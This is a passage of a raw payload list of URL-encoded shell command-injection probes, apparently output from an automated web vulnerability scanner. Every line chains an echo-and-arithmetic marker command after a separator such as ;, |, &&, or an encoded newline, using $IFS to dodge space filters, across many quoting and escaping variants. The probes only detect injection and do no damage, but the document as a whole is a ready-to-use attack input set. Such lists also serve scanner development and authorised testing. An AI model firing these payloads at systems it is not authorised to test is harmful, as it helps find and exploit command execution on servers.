SHKWBBD$((73%2B37))$(echo$IFSHKWBBD)HKWBBD\n%7Cecho$IFSGZSLCQ$((53%2B35))$(echo$IFSGZSLCQ)GZSLCQ\n%7C%7Cecho$IFSJRICXJ$((75%2B92))$(echo$IFSJRICXJ)JRICXJ\necho$IFSHWDYSD$((37%2B57))$(echo$IFSHWDYSD)HWDYSD'\n%20echo%20NEBPFW$((3%2B70))$(echo%20NEBPFW)NEBPFW'\n;echo$IFSEPLQYO$((94%2B56))$(echo$IFSEPLQYO)EPLQYO'\n&echo$IFSTTHLQC$((84%2B38))$(echo$IFSTTHLQC)TTHLQC'\n|echo$IFSGKBHIR$((84%2B74))$(echo$IFSGKBHIR)GKBHIR'\n||echo$IFSSBWRDD$((13%2B29))$(echo$IFSSBWRDD)SBWRDD'\n&&echo$IFSKIKNVD$((50%2B78))$(echo$IFSKIKNVD)KIKNVD'\n%0aecho$IFSOFYRTU$((52%2B75))$(echo$IFSOFYRTU)OFYRTU'\n%3Becho$IFSJPYDWY$((21%2B37))$(echo$IFSJPYDWY)JPYDWY'\n%26echo$IFSXCPZTM$((92%2B95))$(echo$IFSXCPZTM)XCPZTM'\n%26%26echo$IFSWOKOCD$((20%2B68))$(echo$IFSWOKOCD)WOKOCD'\n%7Cecho$IFSSUUIHX$((40%2B15))$(echo$IFSSUUIHX)SUUIHX'\n%7C%7Cecho$IFSAVXTXG$((18%2B58))$(echo$IFSAVXTXG)AVXTXG'\necho$IFSXXONVG$((27%2B27))$(echo$IFSXXONVG)XXONVG\"\n%20echo%20PFLQEA$((81%2B37))$(echo%20PFLQEA)PFLQEA\"\n;echo$IFSMDODNG$((16%2B33))$(echo$IFSMDODNG)MDODNG\"\n&echo$IFSUFORJE$((32%2B39))$(echo$IFSUFORJE)UFORJE\"\n|echo$IFSBTKIBL$((76%2B11))$(echo$IFSBTKIBL)BTKIBL\"\n||echo$IFSZVZDHM$((59%2B26))$(echo$IFSZVZDHM)ZVZDHM\"\n&&echo$IFSLWMKLS$((30%2B88))$(echo$IFSLWMKLS)LWMKLS\"\n%0aecho$IFSCJKHEO$((35%2B18))$(echo$IFSCJKHEO)CJKHEO\"\n%3Becho$IFSUSDTON$((86%2B41))$(echo$IFSUSDTON)USDTON\"\n%26echo$IFSIAHRZI$((77%2B68))$(echo$IFSIAHRZI)IAHRZI\"\n%26%26echo$IFSONQKZZ$((73%2B7))$(echo$IFSONQKZZ)ONQKZZ\"\n%7Cecho$IFSYRTPVW$((55%2B57))$(echo$IFSYRTPVW)YRTPVW\"\n%7C%7Cecho$IFSMXRPLY$((63%2B48))$(echo$IFSMXRPLY)MXRPLY\"\necho$IFSBPKGGQ$((2%2B10))$(echo$IFSBPKGGQ)BPKGGQ\n%20echo%20EPJLZM$((66%2B41))$(echo%20EPJLZM)EPJLZM\n;echo$IFSFRFTEV$((68%2B37))$(echo$IFSFRFTEV)FRFTEV\n&echo$IFSNNJHEA$((98%2B76))$(echo$IFSNNJHEA)NNJHEA\n|echo$IFSDJRUFH$((97%2B3))$(echo$IFSDJRUFH)DJRUFH\n||echo$IFSYXCWNR$((16%2B34))$(echo$IFSYXCWNR)YXCWNR\n&&echo$IFSSUKTVK$((49%2B30))$(echo$IFSSUKTVK)SUKTVK\n%0aecho$IFSRASFNL$((85%2B74))$(echo$IFSRASFNL)RASFNL\n%3Becho$IFSHNITQI$((34%2B44))$(echo$IFSHNITQI)HNITQI\n%26echo$IFSFQWXOL$((0%2B18))$(echo$IFSFQWXOL)FQWXOL\n%26%26echo$IFSJLTIEA$((92%2B83))$(echo$IFSJLTIEA)JLTIEA\n%7Cecho$IFSJFVTNC$((92%2B51))$(echo$IFSJFVTNC)JFVTNC\n%7C%7Cecho$IFSOTLHMR$((33%2B79))$(echo$IFSOTLHMR)OTLHMR\necho$IFSRDFLJS$((32%2B99))$(echo$IFSRDFLJS)RDFLJS//\n%20echo%20EBRLPU$((95%2B26))$(echo%20EBRLPU)EBRLPU//\n;echo$IFSLFANAU$((10%2B58))$(echo$IFSLFANAU)LFANAU//\n&echo$IFSASNAHP$((25%2B52))$(echo$IFSASNAHP)ASNAHP//\n|echo$IFSYIICFW$((82%2B30))$(echo$IFSYIICFW)YIICFW//\n||echo$IFSANCXJL$((61%2B40))$(echo$IFSANCXJL)ANCXJL//\n&&echo$IFSKMSEPJ$((48%2B32))$(echo$IFSKMSEPJ)KMSEPJ//\n%0aecho$IFSKIZTDU$((42%2B50))$(echo$IFSKIZTDU)KIZTDU//\n%3Becho$IFSYTBVMU$((36%2B61))$(echo$IFSYTBVMU)YTBVMU//\n%26echo$IFSQOEJNZ$((82%2B42))$(echo$IFSQOEJNZ)QOEJNZ//\n%26%26echo$IFSCGEGYR$((45%2B27))$(echo$IFSCGEGYR)CGEGYR//\n%7Cecho$IFSEQEOTH$((5%2B24))$(echo$IFSEQEOTH)EQEOTH//\n%7C%7Cecho$IFSTGFHRF$((49%2B19))$(echo$IFSTGFHRF)TGFHRF//\necho$IFSOKGHZD$((31%2B37))$(echo$IFSOKGHZD)OKGHZD\\\n%20echo%20LHYXBV$((13%2B29))$(echo%20LHYXBV)LHYXBV\\\n;echo$IFSOZHGXS$((54%2B58))$(echo$IFSOZHGXS)OZHGXS\\\n&echo$IFSQCRUCK$((10%2B80))$(echo$IFSQCRUCK)QCRUCK\\\n|echo$IFSJJVJHF$((77%2B32))$(echo$IFSJJVJHF)JJVJHF\\\n||echo$IFSVMDOKC$((46%2B15))$(echo$IFSVMDOKC)VMDOKC\\\n&&echo$IFSMRIURT$((57%2B24))$(echo$IFSMRIURT)MRIURT\\\n%0aecho$IFSDEIFSG$((86%2B72))$(echo$IFSDEIFSG)DEIFSG\\\n%3Becho$IFSOIOFGF$((91%2B26))$(echo$IFSOIOFGF)OIOFGF\\\n%26echo$IFSOKMGIJ$((46%2B23))$(echo$IFSOKMGIJ)OKMGIJ\\\n%26%26echo$IFSBAXLLS$((32%2B52))$(echo$IFSBAXLLS)BAXLLS\\\n%7Cecho$IFSHYXPLP$((94%2B38))$(echo$IFSHYXPLP)HYXPLP\\\n%7C%7Cecho$IFSARRLJF$((7%2B15))$(echo$IFSARRLJF)ARRLJF\\\necho$IFSUHEKZF$((6%2B76))$(echo$IFSUHEKZF)UHEKZF&\n%20echo%20OQWHLF$((94%2B68))$(echo%20OQWHLF)OQWHLF&\n;echo$IFSLZAMMD$((45%2B83))$(echo$IFSLZAMMD)LZAMMD&\n&echo$IFSXXOEKT$((47%2B54))$(echo$IFSXXOEKT)XXOEKT&\n|echo$IFSJEBQGT$((57%2B73))$(echo$IFSJEBQGT)JEBQGT&\n||echo$IFSREJVUL$((89%2B39))$(echo$IFSREJVUL)REJVUL&\n&&echo$IFSLUKZZL$((74%2B87))$(echo$IFSLUKZZL)LUKZZL&\n%0aecho$IFSTMJSKG$((79%2B42))$(echo$IFSTMJSKG)TMJSKG&\n%3Becho$IFSNELFTT$((30%2B5))$(echo$IFSNELFTT)NELFTT&\n%26echo$IFSIQEANB$((37%2B80))$(echo$IFSIQEANB)IQEANB&\n%26%26echo$IFSCJZPXI$((34%2B11))$(echo$IFSCJZPXI)CJZPXI&\n%7Cecho$IFSFQIXOT$((96%2B55))$(echo$IFSFQIXOT)FQIXOT&\n%7C%7Cecho$IFSUZTFEA$((9%2B38))$(echo$IFSUZTFEA)UZTFEA&\necho$IFSWBZKTL$((54%2B51))$(echo$IFSWBZKTL)WBZKTL|\n%20echo%20ZBSMBN$((3%2B0))$(echo%20ZBSMBN)ZBSMBN|\n;echo$IFSBISSCY$((69%2B34))$(echo$IFSBISSCY)BISSCY|\n&echo$IFSJTCTWE$((47%2B19))$(echo$IFSJTCTWE)JTCTWE|\n|echo$IFSVPEXDU$((58%2B80))$(echo$IFSVPEXDU)VPEXDU|\n||echo$IFSLYCEOO$((22%2B78))$(echo$IFSLYCEOO)LYCEOO|\n&&echo$IFSAOWKBV$((93%2B9))$(echo$IFSAOWKBV)AOWKBV|\n%0aecho$IFSZBTJIZ$((28%2B56))$(echo$IFSZBTJIZ)ZBTJIZ|\n%3Becho$IFSKSUTZJ$((41%2B59))$(echo$IFSKSUTZJ)KSUTZJ|\n%26echo$IFSHAFMRE$((74%2B52))$(echo$IFSHAFMRE)HAFMRE|\n%26%26echo$IFSEZIXEG$((12%2B57))$(echo$IFSEZIXEG)EZIXEG|\n%7Cecho$IFSJHIHOY$((80%2B94))$(echo$IFSJHIHOY)JHIHOY|\n%7C%7Cecho$IFSVZAWQN$((40%2B93))$(echo$IFSVZAWQN)VZAWQN|\necho$IFSXIHMMK$((37%2B0))$(echo$IFSXIHMMK)XIHMMK%27\n%20echo%20AXKFNN$((42%2B98))$(echo%20AXKFNN)AXKFNN%27\n;echo$IFSXRJTLU$((75%2B30))$(echo$IFSXRJTLU)XRJTLU%27\n&echo$IFSHURAOO$((4%2B19))$(echo$IFSHURAOO)HURAOO%27\n|echo$IFSRRFVYH$((99%2B28))$(echo$IFSRRFVYH)RRFVYH%27\n||echo$IFSFHYCZU$((73%2B44))$(echo$IFSFHYCZU)FHYCZU%27\n&&echo$IFSVOFPVM$((35%2B53))$(echo$IFSVOFPVM)VOFPVM%27\n%0aecho$IFSBFBVGP$((41%2B59))$(echo$IFSBFBVGP)BFBVGP%27\n%3Becho$IFSOECCYB$((90%2B42))$(echo$IFSOECCYB)OECCYB%27\n%26echo$IFSUTPJYK$((7%2B24))$(echo$IFSUTPJYK)UTPJYK%27\n%26%26echo$IFSLUCMYV$((14%2B43))$(echo$IFSLUCMYV)LUCMYV%27\n%7Cecho$IFSPVRRTF$((94%2B25))$(echo$IFSPVRRTF)PVRRTF%27\n%7C%7Cecho$IFSEKSDKJ$((57%2B57))$(echo$IFSEKSDKJ)EKSDKJ%27\necho$IFSFMNKKS$((72%2B97))$(echo$IFSFMNKKS)FMNKKS%22\n%20echo%20BRUWPJ$((24%2B60))$(echo%20BRUWPJ)BRUWPJ%22\n;echo$IFSVBYBZW$((39%2B43))$(echo$IFSVBYBZW)VBYBZW%22\n&echo$IFSLMIPEM$((82%2B21))$(echo$IFSLMIPEM)LMIPEM%22\n|echo$IFSIEVIHG$((35%2B50))$(echo$IFSIEVIHG)IEVIHG%22\n||echo$IFSEULBCJ$((35%2B20))$(echo$IFSEULBCJ)EULBCJ%22\n&&echo$IFSCAAYWG$((20%2B2))$(echo$IFSCAAYWG)CAAYWG%22\n%0aecho$IFSMWSWXL$((58%2B55))$(echo$IFSMWSWXL)MWSWXL%22\n%3Becho$IFSEXIZMZ$((4%2B42))$(echo$IFSEXIZMZ)EXIZMZ%22\n%26echo$IFSCVYZVT$((26%2B52))$(echo$IFSCVYZVT)CVYZVT%22\n%26%26echo$IFSPFGYCN$((54%2B71))$(echo$IFSPFGYCN)PFGYCN%22\n%7Cecho$IFSBKTNUH$((60%2B31))$(echo$IFSBKTNUH)BKTNUH%22\n%7C%7Cecho$IFSCBQMAD$((2%2B96))$(echo$IFSCBQMAD)CBQMAD%22\necho$IFSKVWOUC$((99%2B55))$(echo$IFSKVWOUC)KVWOUC%5C%5C\n%20echo%20RSFFRY$((9%2B19))$(echo%20RSFFRY)RSFFRY%5C%5C\n;echo$IFSNCMFZS$((89%2B41))$(echo$IFSNCMFZS)NCMFZS%5C%5C\n&echo$IFSBMZKTX$((63%2B94))$(echo$IFSBMZKTX)BMZKTX%5C%5C\n|echo$IFSXACUZH$((38%2B20))$(echo$IFSXACUZH)XACUZH%5C%5C\n||echo$IFSCDNNJT$((44%2B92))$(echo$IFSCDNNJT)CDNNJT%5C%5C\n&&echo$IFSQGZOTF$((32%2B38))$(echo$IFSQGZOTF)QGZOTF%5C%5C\n%0aecho$IFSVXNZFI$((43%2B77))$(echo$IFSVXNZFI)VXNZFI%5C%5C\n%3Becho$IFSKUUKMT$((50%2B2))$(echo$IFSKUUKMT)KUUKMT%5C%5C\n%26echo$IFSUNNWEF$((23%2B41))$(echo$IFSUNNWEF)UNNWEF%5C%5C\n%26%26echo$IFSBTZBFI$((26%2B9))$(echo$IFSBTZBFI)BTZBFI%5C%5C\n%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C\n%7C%7Cecho$IFSCPXZIZ$((42%2B75))$(echo$IFSCPXZIZ)CPXZIZ%5C%5C\necho$IFSNEIUQG$((81%2B27))$(echo$IFSNEIUQG)NEIUQG%2F%2F\n%20echo%20AGJORR$((30%2B64))$(echo%20AGJORR)AGJORR%2F%2F\n;echo$IFSZFBJPC$((94%2B13))$(echo$IFSZFBJPC)ZFBJPC%2F%2F\n&echo$IFSBALCSS$((45%2B32))$(echo$IFSBALCSS)BALCSS%2F%2F\n|echo$IFSRLIAHI$((26%2B64))$(echo$IFSRLIAHI)RLIAHI%2F%2F\n||echo$IFSFYOTZG$((27%2B28))$(echo$IFSFYOTZG)FYOTZG%2F%2F\n&&echo$IFSEQAZRH$((48%2B41))$(echo$IFSEQAZRH)EQAZRH%2F%2F\n%0aecho$IFSZJGMJR$((29%2B4))$(echo$IFSZJGMJR)ZJGMJR%2F%2F\n%3Becho$IFSGOFGQM$((48%2B74))$(echo$IFSGOFGQM)GOFGQM%2F%2F\n%26echo$IFSNHIGJT$((60%2B13))$(echo$IFSNHIGJT)NHIGJT%2F%2F\n%26%26echo$IFSXIMJKY$((88%2B60))$(echo$IFSXIMJKY)XIMJKY%2F%2F\n%7Cecho$IFSOLIGWD$((87%2B60))$(echo$IFSOLIGWD)OLIGWD%2F%2F\n%7C%7Cecho$IFSWFKQVE$((90%2B1))$(echo$IFSWFKQVE)WFKQVE%2F%2F\necho$IFSKILZJB$((46%2B73))$(echo$IFSKILZJB)KILZJB%26\n%20echo%20QZXLFH$((87%2B1))$(echo%20QZXLFH)QZXLFH%26\n;echo$IFSKNVVGI$((69%2B44))$(echo$IFSKNVVGI)KNVVGI%26\n&echo$IFSGGNKZG$((61%2B42))$(echo$IFSGGNKZG)GGNKZG%26\n|echo$IFSOOHCGM$((30%2B35))$(echo$IFSOOHCGM)OOHCGM%26\n||echo$IFSUUHQZJ$((20%2B57))$(echo$IFSUUHQZJ)UUHQZJ%26\n&&echo$IFSZBRXDH$((79%2B80))$(echo$IFSZBRXDH)ZBRXDH%26\n%0aecho$IFSYUKKNH$((56%2B49))$(echo$IFSYUKKNH)YUKKNH%26\n%3Becho$IFSVCXHRJ$((81%2B64))$(echo$IFSVCXHRJ)VCXHRJ%26\n%26echo$IFSQKYNMI$((45%2B66))$(echo$IFSQKYNMI)QKYNMI%26\n%26%26echo$IFSQSKLWT$((87%2B73))$(echo$IFSQSKLWT)QSKLWT%26\n%7Cecho$IFSZBEWBO$((6%2B42))$(echo$IFSZBEWBO)ZBEWBO%26\n%7C%7Cecho$IFSDNZMGO$((37%2B14))$(echo$IFSDNZMGO)DNZMGO%26\necho$IFSAGOPUQ$((42%2B10))$(echo$IFSAGOPUQ)AGOPUQ%7C\n%20echo%20OWFQEK$((68%2B50))$(echo%20OWFQEK)OWFQEK%7C\n;echo$IFSKGPTGS$((5%2B86))$(echo$IFSKGPTGS)KGPTGS%7C\n&echo$IFSSTSBFI$((8%2B30))$(echo$IFSSTSBFI)STSBFI%7C\n|echo$IFSCETCMO$((72%2B54))$(echo$IFSCETCMO)CETCMO%7C\n||echo$IFSGUUNMQ$((78%2B22))$(echo$IFSGUUNMQ)GUUNMQ%7C\n&&echo$IFSSYDVAH$((5%2B92))$(echo$IFSSYDVAH)SYDVAH%7C\n%0aecho$IFSEWPWSX$((63%2B88))$(echo$IFSEWPWSX)EWPWSX%7C\n%3Becho$IFSQXXUTJ$((23%2B47))$(echo$IFSQXXUTJ)QXXUTJ%7C\n%26echo$IFSWWWJLY$((48%2B38))$(echo$IFSWWWJLY)WWWJLY%7C\n%26%26echo$IFSAOUDEZ$((1%2B19))$(echo$IFSAOUDEZ)AOUDEZ%7C\n%7Cecho$IFSRIYZJH$((86%2B76))$(echo$IFSRIYZJH)RIYZJH%7C\n%7C%7Cecho$IFSMCOPIM$((20%2B16))$(echo$IFSMCOPIM)MCOPIM%7C\n%26echo$IFSFGJBHF$((15%2B32))$(echo$IFSFGJBHF)FGJBHF\n%26%20echo%20TIBIEC$((4%2B66))$(echo%20TIBIEC)TIBIEC\n;echo$IFSRHWTNA$((89%2B71))$(echo$IFSRHWTNA)RHWTNA\n&echo$IFSMIRTWY$((62%2B53))$(echo$IFSMIRTWY)MIRTWY\n|echo$IFSKZQOKA$((45%2B18))$(echo$IFSKZQOKA)KZQOKA\n||echo$IFSKDFDHF$((15%2B62))$(echo$IFSKDFDHF)KDFDHF\n&&echo$IFSARASQY$((54%2B7))$(echo$IFSARASQY)ARASQY\n%0aecho$IFSIDFVQL$((32%2B50))$(echo$IFSIDFVQL)IDFVQL\n%3Becho$IFSTREOSX$((82%2B26))$(echo$IFSTREOSX)TREOSX\n%26echo$IFSKNRSWF$((61%2B96))$(echo$IFSKNRSWF)KNRSWF\n%26%26echo$IFSKLSCLG$((90%2B83))$(echo$IFSKLSCLG)KLSCLG\n%7Cecho$IFSSWFONC$((23%2B88))$(echo$IFSSWFONC)SWFONC\n%7C%7Cecho$IFSPNPVKS$((7%2B36))$(echo$IFSPNPVKS)PNPVKS\necho$IFSMFYMXE$((53%2B41))$(echo$IFSMFYMXE)MFYMXE'\n%20echo%20ZEKBWJ$((52%2B55))$(echo%20ZEKBWJ)ZEKBWJ'\n;echo$IFSHVLOAR$((38%2B86))$(echo$IFSHVLOAR)HVLOAR'\n&echo$IFSGQPCYE$((3%2B64))$(echo$IFSGQPCYE)GQPCYE'\n|echo$IFSIYVBZD$((59%2B23))$(echo$IFSIYVBZD)IYVBZD'\n||echo$IFSKGDWNL$((30%2B97))$(echo$IFSKGDWNL)KGDWNL'\n&&echo$IFSOVPFJY$((4%2B71))$(echo$IFSOVPFJY)OVPFJY'\n%0aecho$IFSTYZEHS$((92%2B83))$(echo$IFSTYZEHS)TYZEHS'\n%3Becho$IFSXKGKWO$((82%2B28))$(echo$IFSXKGKWO)XKGKWO'\n%26echo$IFSCTPDWS$((75%2B8))$(echo$IFSCTPDWS)CTPDWS'\n%26%26echo$IFSHRVANY$((38%2B49))$(echo$IFSHRVANY)HRVANY'\n%7Cecho$IFSSBTHEA$((52%2B44))$(echo$IFSSBTHEA)SBTHEA'\n%7C%7Cecho$IFSRGNFOX$((20%2B17))$(echo$IFSRGNFOX)RGNFOX'\necho$IFSCWQJJR$((12%2B68))$(echo$IFSCWQJJR)CWQJJR\"\n%20echo%20WJGLHQ$((32%2B43))$(echo%20WJGLHQ)WJGLHQ\"\n;echo$IFSWYKTNX$((57%2B37))$(echo$IFSWYKTNX)WYKTNX\"\n&echo$IFSJZGSQS$((35%2B79))$(echo$IFSJZGSQS)JZGSQS\"\n|echo$IFSQFRZWC$((58%2B49))$(echo$IFSQFRZWC)QFRZWC\"\n||echo$IFSUEGFHX$((37%2B52))$(echo$IFSUEGFHX)UEGFHX\"\n&&echo$IFSWMOQUS$((33%2B35))$(echo$IFSWMOQUS)WMOQUS\"\n%0aecho$IFSRVNRNT$((25%2B8))$(echo$IFSRVNRNT)RVNRNT\"\n%3Becho$IFSFGMEVK$((82%2B64))$(echo$IFSFGMEVK)FGMEVK\"\n%26echo$IFSKWKDEB$((37%2B89))$(echo$IFSKWKDEB)KWKDEB\"\n%26%26echo$IFSPCPZYO$((56%2B87))$(echo$IFSPCPZYO)PCPZYO\"\n%7Cecho$IFSATHGRY$((94%2B45))$(echo$IFSATHGRY)ATHGRY\"\n%7C%7Cecho$IFSPLQDHT$((81%2B8))$(echo$IFSPLQDHT)PLQDHT\"\necho$IFSUYTATZ$((65%2B69))$(echo$IFSUYTATZ)UYTATZ\n%20echo%20DWUNAS$((73%2B45))$(echo%20DWUNAS)DWUNAS\n;echo$IFSDYVMJQ$((81%2B59))$(echo$IFSDYVMJQ)DYVMJQ\n&echo$IFSSFXMFL$((26%2B3))$(echo$IFSSFXMFL)SFXMFL\n|echo$IFSTPUAPH$((74%2B20))$(echo$IFSTPUAPH)TPUAPH\n||echo$IFSETWMKB$((45%2B66))$(echo$IFSETWMKB)ETWMKB\n&&echo$IFSJQGTZT$((74%2B60))$(echo$IFSJQGTZT)JQGTZT\n%0aecho$IFSEMHHKB$((6%2B28))$(echo$IFSEMHHKB)EMHHKB\n%3Becho$IFSMQUPHW$((66%2B11))$(echo$IFSMQUPHW)MQUPHW\n%26echo$IFSYETOFB$((93%2B7))$(echo$IFSYETOFB)YETOFB\n%26%26echo$IFSCRVQIY$((43%2B55))$(echo$IFSCRVQIY)CRVQIY\n%7Cecho$IFSQKTYDP$((13%2B93))$(echo$IFSQKTYDP)QKTYDP\n%7C%7Cecho$IFSHIOXYU$((5%2B45))$(echo$IFSHIOXYU)HIOXYU\necho$IFSONQRPJ$((44%2B25))$(echo$IFSONQRPJ)ONQRPJ//\n%20echo%20IOTEZW$((83%2B52))$(echo%20IOTEZW)IOTEZW//\n;echo$IFSZIROGF$((6%2B49))$(echo$IFSZIROGF)ZIROGF//\n&echo$IFSEGQCCP$((72%2B31))$(echo$IFSEGQCCP)EGQCCP//\n|echo$IFSZGMESR$((73%2B1))$(echo$IFSZGMESR)ZGMESR//\n||echo$IFSDAJJOA$((63%2B6))$(echo$IFSDAJJOA)DAJJOA//\n&&echo$IFSYSBJXS$((33%2B16))$(echo$IFSYSBJXS)YSBJXS//\n%0aecho$IFSGAMIHF$((8%2B20))$(echo$IFSGAMIHF)GAMIHF//\n%3Becho$IFSGIAMLN$((3%2B33))$(echo$IFSGIAMLN)GIAMLN//\n%26echo$IFSSAEWRK$((96%2B15))$(echo$IFSSAEWRK)SAEWRK//\n%26%26echo$IFSLRENSC$((21%2B32))$(echo$IFSLRENSC)LRENSC//\n%7Cecho$IFSSMHPXX$((60%2B18))$(echo$IFSSMHPXX)SMHPXX//\n%7C%7Cecho$IFSXSPEPB$((67%2B12))$(echo$IFSXSPEPB)XSPEPB//\necho$IFSJMCTGN$((61%2B39))$(echo$IFSJMCTGN)JMCTGN\\\n%20echo%20YGXKOB$((39%2B6))$(echo%20YGXKOB)YGXKOB\\\n;echo$IFSGPDOCC$((56%2B25))$(echo$IFSGPDOCC)GPDOCC\\\n&echo$IFSJHJDBQ$((59%2B7))$(echo$IFSJHJDBQ)JHJDBQ\\\n|echo$IFSPYNQQN$((22%2B41))$(echo$IFSPYNQQN)PYNQQN\\\n||echo$IFSXEGABJ$((43%2B91))$(echo$IFSXEGABJ)XEGABJ\\\n&&echo$IFSKQEDXL$((91%2B84))$(echo$IFSKQEDXL)KQEDXL\\\n%0aecho$IFSVXZGNO$((12%2B40))$(echo$IFSVXZGNO)VXZGNO\\\n%3Becho$IFSPSOQAR$((79%2B87))$(echo$IFSPSOQAR)PSOQAR\\\n%26echo$IFSRNOWIN$((9%2B87))$(echo$IFSRNOWIN)RNOWIN\\\n%26%26echo$IFSDKXDPB$((45%2B44))$(echo$IFSDKXDPB)DKXDPB\\\n%7Cecho$IFSAQWEET$((38%2B66))$(echo$IFSAQWEET)AQWEET\\\n%7C%7Cecho$IFSXRRNLV$((42%2B73))$(echo$IFSXRRNLV)XRRNLV\\\necho$IFSWAXZNH$((13%2B26))$(echo$IFSWAXZNH)WAXZNH&\n%20echo%20FMKAYB$((43%2B18))$(echo%20FMKAYB)FMKAYB&\n;echo$IFSNFQTQE$((64%2B35))$(echo$IFSNFQTQE)NFQTQE&\n&echo$IFSGHAYMK$((85%2B70))$(echo$IFSGHAYMK)GHAYMK&\n|echo$IFSILKQLY$((38%2B92))$(echo$IFSILKQLY)ILKQLY&\n||echo$IFSJTVIEI$((59%2B6))$(echo$IFSJTVIEI)JTVIEI&\n&&echo$IFSRUHGTD$((2%2B41))$(echo$IFSRUHGTD)RUHGTD&\n%0aecho$IFSYBIRAD$((77%2B75))$(echo$IFSYBIRAD)YBIRAD&\n%3Becho$IFSNZACRG$((6%2B1))$(echo$IFSNZACRG)NZACRG&\n%26echo$IFSOXDOPZ$((45%2B42))$(echo$IFSOXDOPZ)OXDOPZ&\n%26%26echo$IFSMCBQMM$((11%2B98))$(echo$IFSMCBQMM)MCBQMM&\n%7Cecho$IFSEJJUPB$((40%2B97))$(echo$IFSEJJUPB)EJJUPB&\n%7C%7Cecho$IFSCJGMRV$((68%2B61))$(echo$IFSCJGMRV)CJGMRV&\necho$IFSAAZQPF$((47%2B0))$(echo$IFSAAZQPF)AAZQPF|\n%20echo%20GWYMFM$((13%2B53))$(echo%20GWYMFM)GWYMFM|\n;echo$IFSHKIKWV$((20%2B23))$(echo$IFSHKIKWV)HKIKWV|\n&echo$IFSPTGUJI$((21%2B75))$(echo$IFSPTGUJI)PTGUJI|\n|echo$IFSESSSWT$((28%2B90))$(echo$IFSESSSWT)ESSSWT|\n||echo$IFSDEGINN$((57%2B72))$(echo$IFSDEGINN)DEGINN|\n&&echo$IFSLXPMRF$((61%2B87))$(echo$IFSLXPMRF)LXPMRF|\n%0aecho$IFSVPYEIG$((0%2B32))$(echo$IFSVPYEIG)VPYEIG|\n%3Becho$IFSBJQYNU$((71%2B12))$(echo$IFSBJQYNU)BJQYNU|\n%26echo$IFSKZFTIO$((50%2B29))$(echo$IFSKZFTIO)KZFTIO|\n%26%26echo$IFSZAYXMZ$((3%2B83))$(echo$IFSZAYXMZ)ZAYXMZ|\n%7Cecho$IFSJWHQHE$((54%2B5))$(echo$IFSJWHQHE)JWHQHE|\n%7C%7Cecho$IFSHRKGCV$((26%2B87))$(echo$IFSHRKGCV)HRKGCV|\necho$IFSBFVSUE$((14%2B45))$(echo$IFSBFVSUE)BFVSUE%27\n%20echo%20IJYFHL$((62%2B88))$(echo%20IJYFHL)IJYFHL%27\n;echo$IFSGLCFHE$((9%2B20))$(echo$IFSGLCFHE)GLCFHE%27\n&echo$IFSBGJFMV$((55%2B92))$(echo$IFSBGJFMV)BGJFMV%27\n|echo$IFSZFFAPM$((39%2B91))$(echo$IFSZFFAPM)ZFFAPM%27\n||echo$IFSMWPSUX$((83%2B82))$(echo$IFSMWPSUX)MWPSUX%27\n&&echo$IFSUUESOS$((61%2B71))$(echo$IFSUUESOS)UUESOS%27\n%0aecho$IFSLRBMQR$((4%2B80))$(echo$IFSLRBMQR)LRBMQR%27\n%3Becho$IFSLWIDNI$((59%2B10))$(echo$IFSLWIDNI)LWIDNI%27\n%26echo$IFSEHCFWA$((81%2B0))$(echo$IFSEHCFWA)EHCFWA%27\n%26%26echo$IFSVEMRKI$((43%2B17))$(echo$IFSVEMRKI)VEMRKI%27\n%7Cecho$IFSAVHQSF$((54%2B86))$(echo$IFSAVHQSF)AVHQSF%27\n%7C%7Cecho$IFSBUDOYZ$((31%2B53))$(echo$IFSBUDOYZ)BUDOYZ%27\necho$IFSJEPZHW$((73%2B73))$(echo$IFSJEPZHW)JEPZHW%22\n%20echo%20JMDNRV$((22%2B54))$(echo%20JMDNRV)JMDNRV%22\n;echo$IFSPRIHYT$((43%2B53))$(echo$IFSPRIHYT)PRIHYT%22\n&echo$IFSCMDMMG$((63%2B46))$(echo$IFSCMDMMG)CMDMMG%22\n|echo$IFSGFJBIP$((75%2B97))$(echo$IFSGFJBIP)GFJBIP%22\n||echo$IFSOXMDCJ$((76%2B31))$(echo$IFSOXMDCJ)OXMDCJ%22\n&&echo$IFSLHVDJA$((34%2B71))$(echo$IFSLHVDJA)LHVDJA%22\n%0aecho$IFSFLQCFH$((50%2B41))$(echo$IFSFLQCFH)FLQCFH%22\n%3Becho$IFSOHDIIO$((86%2B73))$(echo$IFSOHDIIO)OHDIIO%22\n%26echo$IFSKOBRCD$((77%2B43))$(echo$IFSKOBRCD)KOBRCD%22\n%26%26echo$IFSOWHNUL$((45%2B96))$(echo$IFSOWHNUL)OWHNUL%22\n%7Cecho$IFSCYXIRA$((56%2B74))$(echo$IFSCYXIRA)CYXIRA%22\n%7C%7Cecho$IFSLSGARN$((66%2B92))$(echo$IFSLSGARN)LSGARN%22\necho$IFSBXVMDK$((6%2B31))$(echo$IFSBXVMDK)BXVMDK%5C%5C\n%20echo%20LCFCBB$((47%2B22))$(echo%20LCFCBB)LCFCBB%5C%5C\n;echo$IFSHWOOOB$((33%2B98))$(echo$IFSHWOOOB)HWOOOB%5C%5C\n&echo$IFSPYIUYZ$((71%2B45))$(echo$IFSPYIUYZ)PYIUYZ%5C%5C\n|echo$IFSAMCJYH$((20%2B48))$(echo$IFSAMCJYH)AMCJYH%5C%5C\n||echo$IFSUCPPVT$((17%2B44))$(echo$IFSUCPPVT)UCPPVT%5C%5C\n&&echo$IFSDFYDRA$((1%2B96))$(echo$IFSDFYDRA)DFYDRA%5C%5C\n%0aecho$IFSODUPZQ$((21%2B13))$(echo$IFSODUPZQ)ODUPZQ%5C%5C\n%3Becho$IFSXJAFQU$((79%2B24))$(echo$IFSXJAFQU)XJAFQU%5C%5C\n%26echo$IFSBWATKS$((45%2B68))$(echo$IFSBWATKS)BWATKS%5C%5C\n%26%26echo$IFSKBVKTU$((41%2B2))$(echo$IFSKBVKTU)KBVKTU%5C%5C\n%7Cecho$IFSIXAXIN$((24%2B47))$(echo$IFSIXAXIN)IXAXIN%5C%5C\n%7C%7Cecho$IFSXZTTAD$((21%2B98))$(echo$IFSXZTTAD)XZTTAD%5C%5C\necho$IFSYIGMIK$((93%2B31))$(echo$IFSYIGMIK)YIGMIK%2F%2F\n%20echo%20PIWJVB$((35%2B55))$(echo%20PIWJVB)PIWJVB%2F%2F\n;echo$IFSAQHLIY$((38%2B77))$(echo$IFSAQHLIY)AQHLIY%2F%2F\n&echo$IFSCXFXGD$((63%2B87))$(echo$IFSCXFXGD)CXFXGD%2F%2F\n|echo$IFSUZPDRC$((26%2B91))$(echo$IFSUZPDRC)U